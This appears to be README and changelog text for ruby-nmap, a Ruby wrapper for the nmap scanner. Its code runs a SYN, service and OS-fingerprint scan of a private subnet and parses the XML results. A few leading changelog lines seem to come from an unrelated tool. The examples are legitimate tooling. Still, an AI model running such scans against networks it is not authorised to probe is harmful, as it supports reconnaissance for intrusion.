  • Ability to specify labels for single-line multimatch JSON outputs
  • Ability to specify relative time parameters using relatime library

• Fixed a false-positive bug with Spamhaus (Github#10)

• Initial release

• Provides a Ruby interface for running nmap.
• Provides a Parser for enumerating nmap XML scan files.

require 'nmap/program'

Nmap::Program.scan do |nmap|
  nmap.syn_scan = true
  nmap.service_scan = true
  nmap.os_fingerprint = true
  nmap.xml = 'scan.xml'
  nmap.verbose = true

  nmap.ports = [20,21,22,23,25,80,110,443,512,522,8080,1080]
  nmap.targets = '192.168.1.*'
end

require 'nmap/xml'

Nmap::XML.new('scan.xml') do |xml|
  xml.each_host do |host|
    puts "[#{host.ip}]"

    host.each_port do |port|
      puts "  #{port.number}/#{port.protocol}\t#{port.state}\t#{port.service}"
    end
  end
end

require 'nmap/xml'

Nmap::XML.new('nse.xml') do |xml|
  xml.each_host do |host|
    puts "[#{host.ip}]"

    host.scripts.each do |name,output|
      output.each_line { |line| puts "  #{line}" }
    end

    host.each_port do |port|
      puts "  [#{port.number}/#{port.protocol}]"

      port.scripts.each do |name,output|
        puts "    [#{name}]"

        output.each_line { |line| puts "      #{line}" }
      end
    end
  end
end

• nmap >= 5.00
• nokogiri ~> 1.3
• rprogram ~> 0.3

$ gem install ruby-nmap